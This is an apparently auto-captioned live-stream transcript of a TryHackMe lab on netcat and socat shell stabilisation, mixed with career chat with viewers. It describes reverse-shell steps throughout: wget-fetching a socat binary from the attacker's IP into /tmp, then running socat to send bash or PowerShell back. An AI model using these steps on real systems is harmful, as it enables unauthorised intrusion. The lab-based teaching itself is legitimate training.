Yellow, yellow.
So recently,
Alrighty, let me stop this. Hello, welcome everybody. Hope you guys can hear me. Let me just double check. One sec. Okay, yes, I am audible. I am live on both places. Cool, cool. Okay, awesome. Hello everyone. Hope you guys can hear me. Let me know if you can't. Two actually interesting things I wanted to talk about. Uh, okay, two interesting things I wanted to talk about today. First, the channel name on Twitch has changed. So now earlier it was Hackers Pub, now it's Censored Hacker. Just so it's consistent with every single platform I have, including like YouTube, Instagram, Twitch now, and if in future I start even including Discord, it is Censored Hacker. So hopefully that's fine with you guys. Another thing, actually, an interesting thing I have is last time somebody mentioned they want captions available on my stream. So now hopefully you guys can see the captions. Let me know if these are big or super big or something like that. I can adjust the size however you guys like, right? Mostly it's for you guys and somebody who is not that comfortable with English. Let me share one really quick thing with you. So I can see as well the captions are there, right? And let me know if you want like me to change the captions or anything. You should be able to see this here. And yeah, that's basically it. Now what we are going to do is go back to our hacking. Earlier we were working on just the netcat stabilization. We worked on Python and RL wrap. We are going to mostly focus towards on Socat and see if we are able to hack the Windows as well as the Linux machine with Socat. Work on Socat all the commands because these were a lot more than the netcat, but we'll cover today all of these, and we'll work on the encrypted shell as well. So all things will be covered. So tomorrow we can start with the common shell payloads. And no, today I won't be using basic, what's this called? Today I won't be able to use the Tmux. I didn't install it. I was playing on a different machine. So from tomorrow you will see Tmux as well. So with that being said, let's get going. Okay, it's here. Now with my Kali, is this the 2025? Yeah, this 2025 version. Okay, you guys can see my Kali is here. Let me connect my OpenVPN. Okay, CD desktop sudo open VPN. No, it's not here. Oh, it's censored hacker now, not hackers pub. Sorry, sudo open VPN, censored hacker, open VPN, and Kali. Alrighty. Okay, now you guys can see this. And I'll go to the new tab, put it here, create a different one, T tab. Oh, I should close this guy. New window. Put it here. And now we'll start our Linux box. First thing, right? Where is... Did I just accidentally close both of them? Do I have here? No. Yeah, I think I closed all of them. My apologies. So I'll set up the tab here. Sudo open VPN. Oh, wrong directory, I think. CD desktop. Sudo open VPN. Connect to the Kali's, TryHackme's open VPN. Yeah, let's keep this here. Next thing I will do is create another window. So right one, just like we'll follow the same convention. Right will be our the one attacker, target. Left will be the attacker side. Okay, this is here. We'll start with Linux. I'll go down Linux practice box and I will drop the link. Oh, that's what I remember now. I was thinking, I was like, what am I missing? I haven't did the pop out of the chat. Okay, here, and for YouTube, here. Good part is you will be able to hack today too, right? With me. You already know what I'm about to do. Here. Okay. So our Linux box user and password is basically shell and TryHackme with the exclamation mark. That's one. Wait. We need the machine's IP. Okay, still coming up. So let's start with the netcat. And let's go back here quickly with our open source thing I was creating. We have RL wrap. Quickly we can complete this because RL wrap, remember one thing, the mistake I made, I was trying to do bash in a Windows. So hopefully that helps whoever is trying to do this. Install RL wrap. And I will be pushing this today because today we will be able to complete this. For the font is good, or do you want me to make it a bit bigger? What works for you guys? Okay, this works. Quickly, I want to complete this so we can move to Socat. Use RL wrap. Okay. For reset, connect to the system, I will say. To the target machine. And remember, in this case, as I drew the stuff last time, right here, in the Windows one, this one, basically we are listening, right? So I'll create this with red. So target is our red, right? Green is us. We are the attacker. This is our target. We are first going to start listening. First, most important thing is listening. Then when we try to run the command here to, let's say, build a connection, it should already be listening. If it is not listening, then things go downhill, because then it doesn't connect, right? Basically. So connect to the target machine, start listening, basically. Start listening with this. And we just need the port number here. I want to make sure the way I'm doing okay. What is do you guys have a better way to like do this? I don't want to plus, I want to add in the string itself. So Python variables in string print. Let's see. Python print variables. Let's see if there is a better way. Print now. It works like this, okay. I have to convert it into Python for like string first. There is no quick way to do it, I guess. Oh wait, there might be. If I do comma, let's see if that works. Okay, so if this is the case, quickly. Previous technique. So when dealing with the Linux targets, it's possible to completely stabilize by using the same trick, blah blah blah. But this one, we are more focused on Windows, and this will prompt only for Windows. That's why we'll keep it there. And the next is Socat, so we'll take care of that later. Let's save this, run this guy. We are going with netcat, reverse, port number, let's say 4444. Attacker's IP 10.10.10.10. So these are the stuff, right? And then stabilize, yes. This should be Windows. Start listening, all these, beautiful. And then I have to just make sure this is like here. And this is good, right? So we have our first just for reverse shell with netcat is working. Now we can close netcat and just focus on our Socat. Okay, so technique number 3, Socat. The third easy way to stabilize a shell is quite simply to use an initial netcat shell as a stepping stone into a more fully featured Socat shell. Bear in mind that this technique is limited to Linux targets, as a Socat shell on Windows will be no more stable than the netcat shell. So one important thing here is to notice that, right? So what we can do is only for Linux targets, right? To accomplish this method of stabilization, we would first transfer a Socat static compiled binary, a version of the program compiled to have no dependency. So making sure just like we did rlwrap install on them, right? We need this Socat static one. Compiled to have no dependencies up to the target machine. A typical way to achieve this would be using, one sec, I made a mistake here. Okay. A typical way to achieve this would be using a web server on the attacking machine inside the directory containing your Socat binary. So basically on the attacking machine, first we are starting a HTTP server. So again, let's go back to our drawing. Here, this is our target, right? And this is the attacker. First step here in this case will be to start a HTTP server. Why? So we can get the Socat file, basically the program inside it. That's the main one. So let's do that. This is the Python file. So okay, cool. Let's write it down for our stuff. If type of shell equal reverse. Print. I'll do all the color coding later. I think first now this one will be more important, is to start. First is start HTTP server on target machine, right? That'll be the first one. Second step. Then on the target machine using netcat shell. Also, let's keep hacking as we do, right? That'll be fun. So we have Kali. The IP of the machine would be here. Is there any special instructions? Nope, just SSH into it. Okay. SSH. I'm brain dead. SSH, and it is Linux. What is the code? I know the password is TryHackme. I don't remember the name. Username is shell. Okay. So here we'll do SSH shell at the IP. We'll get our pass. Oh, wrong one. SHELL. Right. So here, yes, we want this to be added. Password will be TryHackme with the exclamation mark. Yeah, okay. So just for anyone who wants to see, right? We are inside shell practice. Basically, that's what it says in this ASCII banner. We do ls pwd, let's see, home shell. I will keep it up because I know the captions. I will try to remember that. Because I know a lot of people mentioned English is not the most comfortable language, so I'm just going to work towards that for you guys. So we have here, now we have technique 3, Socat. We'll start our Python 3 -m HTTP server. Then on the target machine using netcat shell to download the file. On Linux, this would be accomplished with curl or wget. So curl, if you don't know curl command, basically it's one of the commands just like you do on your Chrome or any of them. You get, let's say if I go facebook.com, right? I'm kind of curl get me whatever resource is at this domain name, facebook.com. So that's the whole idea. And you now know one of my demo emails, which is fine. So we have this wget IP address /socat tmp socat. Okay. So let's do that. Python 3-m. Oh, why I'm not able to type? No? What's going on? What is going on? Okay, interesting. Let's see if I get same thing happen again. So I'll do SSH shell at the IP, and what does the TryHackme look like? TRYH4 and M is 3. Okay. Come on, what's going on? There's nothing here, right? Okay, I'll just close my Discord for now, just in case. Sorry if anybody want to chat on there right now. You guys can join it and I will be available later. Let me cancel this one. No? Okay, password. This time it's asking for just password. So try H4CK capital M3 exclamation mark. Shell practice. Beautiful. We have this. Now we'll do Python 3-m module http.server and we'll put port 80. Permission denied. Okay, why? Reverse bind permission denied. Python not found. Python 3 sudo apt install. Okay. Shell password is try h4ck m3. Now it should be, oh, now it should be Python 3. Bro, are you a hacker? Kind of. Kind of, I will say. Just a noob hacker, you can say. How about you, buddy? Do you want to be a hacker? So if anybody's wondering, this is the chat here going on. I'll put this like this. So I want to learn hacking to get a job in cybersecurity. That's good. Like, I'll put this. One thing I'll do is I'll make a quick change for you guys. I know because of the captions and stuff, things would be hard to read. But, bro, this is a good place to start. Like, if you want to, why you want to be in hacking, if you don't mind me asking? Why hacking? What's interesting about hacking for you? But that's a good. Cybersecurity is an amazing field. I will say that. No. Go for it. Bro, this is all about asking. Keep asking. Keep asking. I love it. I love it. Trust me. Keep asking. I'm looking. And that's the reason I do live stream, right? Like, to be able to chat. My whole idea of starting live streaming and this journey is because, first of all, I love cybersecurity. Second, I want to help people because when I was in university and high school, people used to give me very crazy looks about when I used to say I want to join cybersecurity. So I'm just doing what I didn't get, basically. Okay, what's that? It's my passion and dream from... oh, nice. Likewise, bro. If this is like, one of the best thing is like, just like have partners. Like for me, I come every day, Monday to Friday, for hacking, learning about Linux, networking, whatever, from a cybersecurity perspective. Also, there are some really good tools. I'll give you the Discord also, join that. So you can ask a lot of good people here in that about it. Let me drop this. So this is the Discord I created. You can join that, right? And DM me. I'll send you a bunch of links. One of the biggest ones being TryHackme, amazing platform, right? This weekend I will be probably doing what is the date? So if not this weekend, next weekend I'm doing a giveaway. So a free TryHackme 1 month subscription. So feel free to join that, right? Hopefully it helps. And yeah, just learning. There is like learn by doing, not by reading. Hacking is more of one of those things you have to do instead of just like learn about it. Just like swimming or biking, right? You have to do it. So that's one of those type of skills. And TryHackme, those type of platforms help you practice that with legally. And yeah, just keep going. It's amazing, I will say, amazing career. You are on the right path if you're looking for these. And a lot of people on YouTube are looking for different things. If you are here for this, you are looking for live streaming, these things, you are in a great on a great path. Keep it up. I'm proud of you. Keep doing. Make me proud. Let's go. Okay, let's see this issue though first. 3.6 NumPy 168 run module, blah blah blah. Address already in use. Okay, sorry. So I will say 4444, or maybe I'll go 80. Something is wrong with this shell. 80. No? Okay. Oh, numlock it off for me. So if you are dumb like me, bro, I'm very dumb. So I'll give you that right now. I have done a lot of dumb things. Let me read properly that. One sec. Let me first start this HTTP server and let me read that then. Okay, our server is working, so we can install the files. So what do you say? If you're dumb like me, I'm very dumb, so I don't think you are as dumb as me. Now, based on your experience on hacking, what would you do first? I mean, starting point, what you. Okay, let me ask you this first. Which stage of life you are at right now? Are you a student? Are you a high school student, university student? Are you already doing a job? What you doing? Based on that, I think the answer will change from my perspective at least. And for everyone else, here's the Python 3 server running. What we now need to do is download Socat on it. 21, bro, good job. You are young, you are on the right path, right? 21, amazingly young age, so you are in a very good shape. I will say, and you are in university, right? If I'm not wrong, like probably last year of your university, last or third year, third, fourth, or fifth, one of those years, right? Watch, one sec, here, stabilization. We have our Python 3 running, HTTP server. What we need to do, local IP, Socat. So this will be my IP they're asking. I've completed my bachelor's degree in computer applications, nice. And you are doing a job or you're looking for a job? ifconfig will give me the IP addresses. The one I want is this one, tunnel 1, and there is tunnel 0. So this is the one actually, 13.86.9. So it's running. So wget socat I actually want to save my IP first. Tunnel 0, 10, copy selection. What is that? Let's see. I'm from India, bro. Southern part of India. Oh, nice. That's awesome. Right now, I'm doing my MCA, Master's Computer Application first year, but not going to college. Okay. Yo, that's actually good. So your Masters, are you doing is it like a research or something you are doing? 10.3. Because my plan would be, if let's say you are doing a research, right? Or can you move your research or projects? Because I believe masters is project or thesis oriented, right? Let's say if you are doing masters with like a project oriented one, right? Pick a cybersecurity project, right? And just hit that. Best way would be, in my opinion, let's say if I was in your place, because I was going for masters, right? Instead of job. Not research, just for degree. So just learning, just taking course, or you're actually doing project. Oh wait, even if you are doing degree, there should be course projects, right? That works actually. Let me give you quickly intro what I would have done, because I was looking into going for masters after my bachelor's, but because I live in Canada, and we have minor and major projects in my second year. Okay, perfect then. This is perfect timings for you. See, here's how you have to plan this. Go on TryHackme. Even just come on the Discord, ask chat with people, right? Go on TryHackme. I don't know how much you already know about these, right? So on TryHackme there is paths. Where is paths? Learn, challenges, get certified, learn. Okay. So there is learning roadmap, right? When you go here, you can just, I don't know if you have good knowledge of security, little bit, right? You can start with pre-security, security 101, right? And just look at SOC, junior penetration tester, security engineering, whatever you like, pick one, complete it. Even if you don't like it, complete it, move to the second one you think you might like, right? Let's say for me, I knew I like kind of the research part aspect of, and also like some hacking aspect of it. like two of these. So I'm doing like whatever I do, I complete mine. This is like introduction cybersecurity, not these, but for example, introduction to web hacking, right? Walking an application, content discovery, all these just go through all this. Just beat the hell out of it, right? If I don't have the best words, but I'm in college, we don't have option to select a course, college only decides. So bro, you don't have any hope from your college. Okay, makes sense. I don't think majority of the people do have hope from their college, because colleges are were designed so long ago, right? That they will help you to get into industry, but those industry was like in during the industry revolution, they were getting you ready for those type. But industry has changed, colleges have not, education department has not. Elon Musk even said, right, for America it's easy to go to Mars than to change the education system in this country. So I understand that. So that's why I will say, don't worry. Make sure whatever your how you plan is this. Start with TryHackme. I'll call TryHackme THM, right? Start with TryHackme to the roadmaps. Once you do roadmaps, right, complete them, fully complete them, like just beat the hell out of them. Do your roadmaps. You will get you understanding of different aspects of cybersecurity, right? Because cybersecurity itself is a big thing, like computer science or doctor. In a doctor, there is surgeons, there is newborn specialists, there is heart specialists, there is like there's like just so many like specialists, like women specialists and all those, right? So you learn all these aspects like vulnerability research. Purple team, inside purple team there is like research, right? There is SOC for defense. You will learn about these, right? A good touch maybe in the roadmap, starting roadmap, you'll touch all of these. You'll see, okay, this is the one that interests me. Let's say you are interested in like research part of it, right? Or even like, let's say, intrusion prevention system. A good example one I was going for is intrusion prevention and intrusion detection systems, right? You were like, oh, you know what, I like this part. Now you look for like, okay, what will I do with this? I want to go further in this through my college. All the courses I'm taking, I have to take, are about cybersecurity or computer, but I want them to be cybersecurity related. You take this. I was about to go on Snort. Snort is an open source network intrusion and detection system. I was like, I will learn how this works because people have done thesis on this. So you can have your projects around this. For example, let's say you have a concurrency course. Based on my bachelor's, I'm good at programming. I love programming, especially in C, Java. It is awesome. Then Snort is like in C or C++, right? Let's say you are in C, right? You like intrusion detection and intrusion preventions. And your course now is concurrency. Concurrency course, right? Concurrency, how is it related to intrusion prevention? What you can do is like, let's say if in the concurrency course I learn, okay, there are multiple threads I have to learn and all those. Can I improve Snort in such a way it can run multiple processes, right? And also share a same, let's say, Redis. Redis is like cache, right? Database for fast access of data. Can I share latest information? All are in sync when it comes to data, but even though they are running parallelly. It's a pretty cool project. Think about it, right? Or, hey, I love cybersecurity, and there are, even with, let's say again, you are in intrusion detection, intrusion prevention, and there is an AI course. Now the course is AI. How can I mix AI with intrusion detection and prevention? What you can probably do is create an AI, a GPT, or let's say an agent. A good word will be agent for this. Create an agent that pulls sources from things like VirusTotal and other like sources, along with intrusion prevention system like against snort, for example, because we are already talking about it, with snort, and improve snort's efficiency, or improve the intrusion detection algorithm with less false negative, false positive, and all those things, right? Improve that. What's that? It's like a firewall. Yeah, it is like a firewall intrusion detection and prevention system. Yep. And to give you a good idea how big it is, we are at Snort 3 from a long time. Videos, there is a bunch of videos. A lot of people just makes so many videos about it. But let's say GitHub, a good example to see how big this is. Snort 3 should be the one name. You see Snort 3 first, easy thing. No, not this. Is this the one? Oh yeah, Snort 3 team. 211 followers, not super massive. But Snort 3, Snort plus plus, 3,000 people are looking at it, right? How much networking concept? Honestly, depends on where you are going into. If you are going into intrusion prevention and system, just start doing it. Don't worry about it. Just start doing. As things come, you will learn it. Don't worry about it. Do not go in the wrong. This is what I have done wrong in my life, right? And this is the best example right now. What you are seeing is this streaming. Before my current censored hacker, right? Before this current channel I have, censored hacker, I had a different channel. Problem with that one was I was overwhelmed with the system. I was burned out, and it didn't do well. It was down. Why? Because I was thinking, I need to get all the plugins before. I need to make sure all the network marketing is in place. I want to make sure all the Photoshop things is in place. I want to learn this. Never made any progress. Best is to start doing, figure it out on the way. So don't worry about, what networking. I mean, I know a little bit networking. Chunk coffee. Yeah. And let's say if you are like looking at, you want to make some contributions to Snort, right? Look at the issues they have. If there is some good bug report, improper handling of this timestamp validation. Look, what is protection against wrapped sequence number? Look at it, understand what it is, and you can ask in the community. People ask for these questions, right? Don't worry, just get your hands dirty. Don't worry about, I need to learn networking first. Pick what you actually want to do. Don't worry about things around it. So hopefully that helps, right? And if you want, we can talk more. Join the Discord and we'll talk more. Okay. Let's get going with and you can learn right now some hacking and networking, right? Is HTTP server, HTTP, right? Port 8080. I have this server running. Now I want to get a file inside it. What I will do? Let's say I'm here. I'll close this TryHackme tab and I will open this one. I need to get this Socat binary into my Kali first, into my local machine, right? And transfer it to the attacking target machine. Downloaded. This is the system. I'll put it in my desktop. Okay. Now I want to see, because I don't know what wget this exact command does. That's fine. I'll just ask my AI. Okay. Does this command do? Oh, I forgot to put the command first. My bad. Yeah, Monday to Friday. My Monday to Friday is regular. So, and even on weekends, I'm hanging out in the Discord. Like, I'm just listening to some lofi old Bollywood songs, like 1960s, 1970 old Bollywood songs. So, if you have any questions, you can just pop there too. Timings, basically it's around 7 to, I start around 7 to 7:30 p.m. PST. So what time is it? What IST time now? So it is your 7:30 a.m. in the morning, 7:38 a.m. in the morning, and I go for like an hour and a half, 2 hours, 3 hours, depending if I have stuff. Benedict, hold up, Benedict. This guy is a G man. You look, we are. Oh look, we are actually doing something besides Marvel Rival. I see what you mean. Yes. Yeah, on weekends it's okay to play games, man. It's okay to play games on the weekends. Yeah, everybody needs to relax, including AI. How are you doing though, Bandit? How's everything going? How was your long weekend? Oh, wait, do you have a long weekend? In you are in America actually. You probably don't, right? Oh yeah, because it's in British Columbia. We have Victoria Day, so today was my holiday actually. Binary file from web hosted on your this saves it to Denka instead of using default. Okay, this is on my local network. I have to put the right path, right? Who the hell is Victoria? I don't know. Maybe. Actually, that's a good question. I don't know. Probably one of the queens in because I live in British Columbia. Probably one of the queens. You doing job or something? Yes, I do during the daytime. Yeah, I do. That's why I do this during nighttime. Like my morning job starts like around 8 a.m. in the morning, ends around 5. Take some like just go for a walk, have some like do some dinner prep, or just go for swimming. I like swimming a lot, and then I start this. So that's how I manage. Grind never stops, and I love it. I love it. Honestly, I love it. Is I love when people are talking. It's just a great feeling. And you get to ask questions, right? Like want. I think that. Sorry, I don't know your name. I will just go by the handle. We have amazing people like Bendit. Now it's more like work, Marvel Rival, something. Yeah, I love it. I love it. It's fun. It's grind. In the starting, it's grind, a lot of grind, but now it's fun, right? Is I get to hang out with people, and you get people, amazing, amazing people like Benedict here, who have, I will say, 20 plus years of, more than 2 decades actually, more than 2 decades worth of cybersecurity experience. Worked with like big guys like Dell, Rapid7, Metasploit contributions, multiple. And I did a podcast with him in which I asked him these questions which you are asking. So he's a guy. He's the guy to talk to in the channel. So I have this desktop or home desktop slash Socat dash O. So let's see what is this like. And Benedict comes, roast me, leaves. That's all he does nowadays. That's what he likes to do. What about security engineering? Is it worth it? If you love it, it's worth it. That's how I will say. Do not look into money aspect. Money will come. Make sure you are in the right path of what you like. Okay, let's see this. A typical way is to achieve this is by using a web server on the attacking machine. Let me read this properly. One second, let's. So, want. I have the answer from the big guy. Bendit said security engineering can be a fun job. So here you go. This is the guy to listen to more than even you should listen to me. This is the guy. If he says, it's probably 100%. And especially like make sure you love it. It's worth it. Typical way to achieve this would be a web server on the attacking machine inside the directory containing your Socat binary. Way to achieve this would be using a web server on the attacking machine. Oh, I did the opposite here. My bad. So I did the opposite. What we were supposed to do, here's the target machine. This will do wget. Here's the attacking machine. And here I will set the HTTP server. Oh yeah, Bandit, my man says, thank you, buddy. Yeah, no. Great guy, great guy. He's a great guy. Okay, I'll stop this guy. Oh, my server again, this one. I hate TryHackme is like very hard to work with today. So I'll first start the Python 3 HTTP -m HTTP server 8080. Let's say I start here. It's working. So now all the files will be available to the target machine. Why is working so crazy today? Oh, I might have to change the network settings later for this. I want to make sure this is working. Yeah. But I'm just a born baby in cybersecurity field. Even I would say I'm in mother's womb. Don't worry, man. Wget the Snowden toolkit. Not today, especially not on stream, but yeah. Don't worry, Bond. You will get there. Everybody starts from zero, man. I started from zero, so don't worry. Snowden toolkit. What is he? Dave Snowden deployed a series. No. Okay, let's see. Citizen Foss. The Yale Privacy Lab premiere. Is this the one you were talking about, Bandit? Oh, the everything. Oh, he used wget. I didn't know. Cool. Where does it say he used wget? Did he mention in one of the articles? Oh, wrong one. Wget 10.13.86.9 slash home slash desktop slash socat dash o output it to slash tmp. Oh, you guys can't see me, right? 1 second. You guys can't see that. Hopefully now it's better. Edward Snowden used wget to download everything in the original interview, I think. Oh, okay. Ah, nice. Okay, you got it one. Nice. That's awesome. So now what we are doing, we have this left one is our attacker machine with the exploit, basically Socat dependencies. Right, we have the one we want to get a reverse shell from. So we get wget home desktop socat dash and socat again, and this is not working. I don't know what's happening with this. Is it happening to anybody else? You guys have used... Oh, Bandit, probably you are using Hack the Box today, right? I don't know why this is... Maybe this is just slow today? Edward Snowden used wget. Okay, need to get away with this. I don't want to show how I do it. Seems to have rubbish security behind the firewall. Oh, he did wget-o-r. So that's basically recursively he was getting everything he wanted. I'm immortal on the video. That's hilarious. Thanks, man. It means a lot. That's interesting though. Like he used just wget-o-r. So like I think that's what insider threat is considered as one of the worst ones, right? Nobody knows what's going on inside. And I want to see why this is being so bad. I can't do anything. Yeah, I'm not right now. It's actually like because I was running the commands on the right side and my face was covering it. That's why. Actually, now I can be. Now it's here. Hopefully now you guys can see me. In a second. Yeah, okay. So here I want to do shell inside this one. Password TryHackme. So here I will do wget. Oh, I had the command copied. Never mind. Wget 10.13.86. That's the IP address on the VPN of my attacker box. /home/desktop/socat-o output to /tmp/socat. Okay. Did it work? ls/tmp. Socat is there. You guys see it? You guys see it? Hopefully won't you see it, right? Socat is there. Now, that's the second thing we wanted, right? On the attacker's machine, print get the Socat dependencies on the attackers or target machine. Wget attackers IP path to socat-output and /tmp/socat. So this gets the file inside. Now what we have to do with Socat. Hopefully this is I hate this today. Okay, let's see what you said. Bro, if a website contain firewall, when I scan on it, it shows filtered. Is there any alternate way to bypass it? So I didn't get it. Like, so first of all, I will get your terminology right. Like, websites don't contain fire. Do you mean paywall or firewall? Because firewall is a networking thing. That's if you are trying to attack the network. Website don't contain firewall. WAF? Oh, that one. I thought like we are talking about. Sorry. But this one is like the one. This one is different one. Wait. Okay, my brain is clogged. Web application protects web application. But this is a different way of like. This is like a different. Yeah, like. Oh, this one is doing that. Okay. It shows like filtered. Oh, now I see. Okay. I was wrong. Yeah, I was thinking about the network firewall. And like, I'm like, websites don't contain that if you're doing nets different scan. What do you have to say? You could try scanning from various proxies or Tor. Okay, so you can use Tor, bro, as mentioned by Bandit. It shows like filtered. Can you post in the Discord like a image how it shows? What are you trying to do exactly? Let's snooze the ad. I don't want people to see ad. So Bandit is asking what exactly you are trying to do. Let me make it a bit bigger like this. Yeah. Much better. Okay. Okay, this is working somehow. ls. What I want to do now is with the Socat. I'll go back to what I was doing quickly. You can ask in the Discord as well, like with the description of what you're trying to do. So now, for the sake of completeness, in Windows CLI environment, the same can be done with PowerShell using the invoke web request, blah, blah, blah. Okay. I'll put this here. Just scanning my college website, Nmap. Well, do they have, like, I think here's the thing, bro. Do they allow that? What you're trying to do? Do you have the permission? Do they have like a how to say? Do they allow you to hack? So, are you running scripts, etc.? Maybe try ST stealth mode. Is that T is the stealth mode one or S was the stealth mode one? I need to remember these flags. ST is connect. Oh, yeah. Sync. Where is ST is TCP. Okay, there is stealth one. There is a proper connect one. Okay, I see. Got it. Full handshake. Game Boy, namaste. How you doing, bro? I also did that. Okay. Game Boy, what's up, brother? Wait, hold up. Bro, first of all, I will say from total like ethical perspective, make sure they have a system. Oh, I'm doing good too. Thanks, man. Had a long weekend holiday, so I'm very happy. If I scan and find something, I'm gonna show it like a simple minor project kind of thing on college. But you need permissions first. First of all, you need a permission from the IT department, or they should have it on their website if it is allowed to do that. Because if you show without, like, I'll tell you this, I had this incident, like, I showed them something and it was taken in a very wrong way. So, from my personal experience, don't do it unless and until it says that it's okay to allow. And if do not, make sure it's in writing on the website or on the email, wherever you ask, whoever you ask. Get it in writing. Because it can be very devastating. Okay, we have Socat, by the way. Now let's go back to what we were doing. With any of the above techniques, it's useful to able to change the terminal STT. Why we did this? I just want to run the Socat now, which was here, I believe. No, okay, Socat. So now we have Socat inside the surface, inside the machine. Socat is similar to netstat in some ways, but fundamentally different. Blah blah blah. We completed that. Socat TCP-L port. So a reversal, as mentioned previously, the syntax of Socat gets a lot harder than that of netcat. Here's the syntax for basic reversal listener. So listener is will go on our system, and now because we already have installed the Socat on this system, we can start a reversal on here. And I want to listen on port, let's say 4444. Bro, I want to become a web penetration tester. What should I do? So TryHackme is again good one, right? Another good one is OWASP. That's what I learned. Learn about this. This is all about web mostly. It's mostly about web. The name itself says Open Web Application Security Project. A very big one. Go through their website. But if you are like, as you mentioned, you are very, very new to this, make sure you go through some TryHackme free courses first. A bunch of them is free, so just go through that. So now first here we are starting with the Socat listener on this TCP-L for listener 4444 port, right? I'll do wrong thing. Socat reverse shell. We are in the reverse one actually, so that's good. What's going on? Okay, as always, this with Socat, this is taking 2 points: a listening port and the standard output, and connecting them together. Resulting shell is unstable, but this will work on either Linux or Windows and is equivalent to NCLV port number. Good to know. On Windows, we would use this command to connect back. So this will be on target. This will be on listener. This is listener, so it will be on attacker. I'm just going to make a comment, like I'll just get this coding done later for you. Right now, what are you doing? Like which under cybersecurity, which field? Okay, I'm doing Linux privilege escalation. So to give you a quick idea what privilege escalation is, right? Let's say you are in college, right? And there are floors in college. You should only be allowed as a student on floor 1, right? For every one person, you need like higher privilege. So for example, here it will be staff, right? Level 1, level 2, level 3, level 4, right? Every single floor has documents and all those stuff. You should only be allowed as a student on level 1. Level 2, sudo is king, right? So sudo, yes. If you read sudo, yes. But let's say you don't have sudo, then what to do? That's what we are figuring out right now, right? Yep, super user do, that's correct. So let's say the staff 2 will be like janitors. And remember, level 2 people can access level 1, level 3 can access level 2, 2 and 1, level 4 can access all. So here, let's say janitors and other staff like canteen staff. Level 3 is about faculty, who is like teachers. And level 4 is your president, right? Now, if sudo is not there, right, we want to do our privilege escalation. How, as a student, we can get level 2 access, level 3 access, and level 4 access. That's the what we are covering right now. So, and here we have the one way is like we are trying to first get shell. We are trying to be able to connect to the system. So, a tool we are using is called Socat. TCP, you know the protocol, right? The IP address of attacker's IP address, attacker's port, execute PowerShell, and pipes. Pipe option is used to force PowerShell to use Unix style input output. So, and you can use this. I will be putting this online. I'll do it like this: cmd.exe. This will be online on GitHub, and you should be able to see through what I'm doing in this mode. This is equivalent command on Linux as socat this bash li. So what we are doing, this is Windows, Linux. What we are doing here, let's say on attacker's machine, we are listening, right? Web pen testing practice on some bug bounties. So yeah, that's actually a great one. So Ben did mention do recon, get good at it, right? Do web bug bounties. Bug bounties you can do ethically. Again, make sure it's ethical. Because once you lose the reputation, there is no going back. HackerOne. HackerOne is a big one, right? And then there is BugCrowd. Two big cybersecurity like bug bounty ethical ones to do. So go through these ones as well. They're offering, and you'll learn a lot. Let me drink some water, lads. Sorry, I've been speaking for so long, I'm losing my voice. So, here on Socat, we are listening on attacker's machine. On target Windows, we do this. So, attacker's IP, maybe change that. Attacker IP, attacker port, execute PowerShell or bash. Yeah. Another one given by Bandit is integrity. Here. Thanks, Bandit. So we have this bash, and let's say if I'm able to get this now, let me try it on Linux. Socat TC Kali. I'm listening on port 443. I want to use this and attack on my system. Valentino, how you doing, brother? You're new. Welcome to the family. Welcome to the family. How you doing? Let me just change this quickly. Okay, lost some connection here to the machine. So the port will be 10.3 here. This will be the one. Let me get the command ready. Are you new to cybersecurity as well, bro? "4444 execute this." Here we go. And let's see if this is there. So right now, the machine I'm trying to hack or get reverse shell from, that's giving some error on TryHackme's side. I think there is this, then there is bind shell. That can be done. We can, again, just changing of the sides of where things are working. Right? That's easy. And then encrypted shells we've worked on. So I will move through fast. And good part will be today we complete this. I push this code and everything. So anybody who wants to learn reverse shell is easy to play some Q&A with themselves. So let's see if this is not working yet. Okay, we got a message. Thanks, bro. Do you have a Discord channels? Oh, no worries, bro. No worries for English. I'm also immigrant. I live in Canada, but I'm an immigrant, so don't worry. My English has not been the best. Yeah, here's my Discord. Feel free to put it. Actually, funny thing you mentioned this because last week on Friday, or Thursday actually, a great guy, Salentor, I think that's the name. I'm forgetting, but he mentioned he was having English issues as well. So that's why I added the caption. So hopefully that's helping you. Let me know if you want me to increase the size or decrease. Hopefully this is good, right? Okay, ads will start in 3 minutes on Twitch. So let's run this fast. Once the ad starts, I will pause. And if you have any questions, feel free to ask in the Discord or here. I will be available. For 3 minutes, we'll pause because to be respectful to everyone on Twitch. If ad plays in future on YouTube as well, if the ad plays, I'll pause. You can chat, but no further progress on this, on the work we are doing. Let's say if you're hacking CTF, right? This shell is not working. Is this one working? ls. Okay, this one is working. So if I do ls/tmp/socat. Oh, ls/tmp. Socat is there. Oh, wrong thing. I'll quickly copy this guy. Copy. Come on, connect. Wait, it did connect, not connect. Okay. You see, so here on the left is my attacking box. Right, it's connected, and the beautiful part is it was pretty fast, and I loved it. Now, issue though is, can I access? No, all the arrow keys are not working. So let's stabilize it again. Here are the commands we did last time in the netcat itself. Stabilize Python, this one, right? All the commands are here. I need to memorize them first too. Python is there. And then I will do the X term, export term, X term, Control Z background, and stdy raw echo foreground. Control Z, suspended, stdy raw echo foreground. Oh, Python command is not correct. Oh, yes. Okay, and I'm stuck. Yeah. Python command. So this should not be there. Okay. I remember there was one command to help me with this if I get stuck. No, okay. What I'll do is quickly, I was listening with Socat TCP L444. So Socat TCP-L with port 4444 and dash. Just need to do this again. So Socat, do you know about netcat? Try reset. Okay. Do you know about netcat, bro? If you know about netcat, basically Socat is, there is a system going. Once this works quickly, Socat TCP. So if you don't know about netcat, right? Let's say if you have, you are inside, you want to get a reverse shell, right? Okay, there is an ad. Okay, pausing for the ad, right? Okay, pausing till the ad is stopped. But Valentino, so netcat, right, or Socat for that matters. Let's say, one second, apologies. I'll make this do not disturb. Let's say you have you get a RCE or something in a server, right? In a target server. So kind of correct. It's way to get connection, but more specifically, not a client, more in the attacker and target system. So if you are attacker, you want to get like a connection from so that you can get a shell inside the target server. So that's what Socat is used for specifically. Hopefully that helps. Like it's way to get a connection to the attack's target. With client, you already know you are already getting all the things you need. Socat is a bit different. You're trying to get a reverse shell. So hopefully ads is gone. I think ads should be gone, right? Bend it. The ads are like small ads I put. Yeah, okay, awesome. So Socat and Netcat is basically ways to get shells back to you. And we'll go back to our system here. No. This is still not working. Okay. Come on, come on, come on. It's not working on here and it's not working on here. I'm just confused what to do. So add 1 hour. Maybe that might help. I don't want to restart it because I've done it before and it doesn't help much. Like terminate and start a new machine doesn't help much. So if I close this one, start this. You watched there is McDonald's ads on my sister. I watched a mac and cheese ad. It was a waste of 15 minutes of my life. Sorry, bro. Yeah. Like those burgers and stuff I want to reduce too. It's interesting though, McDonald's is introducing a veggie burger now in Canada after years of or decades of already into it being introduced in India and everywhere else basically. I don't understand why they do that. Like why so many good restaurants are not doing what they are already doing in India. They 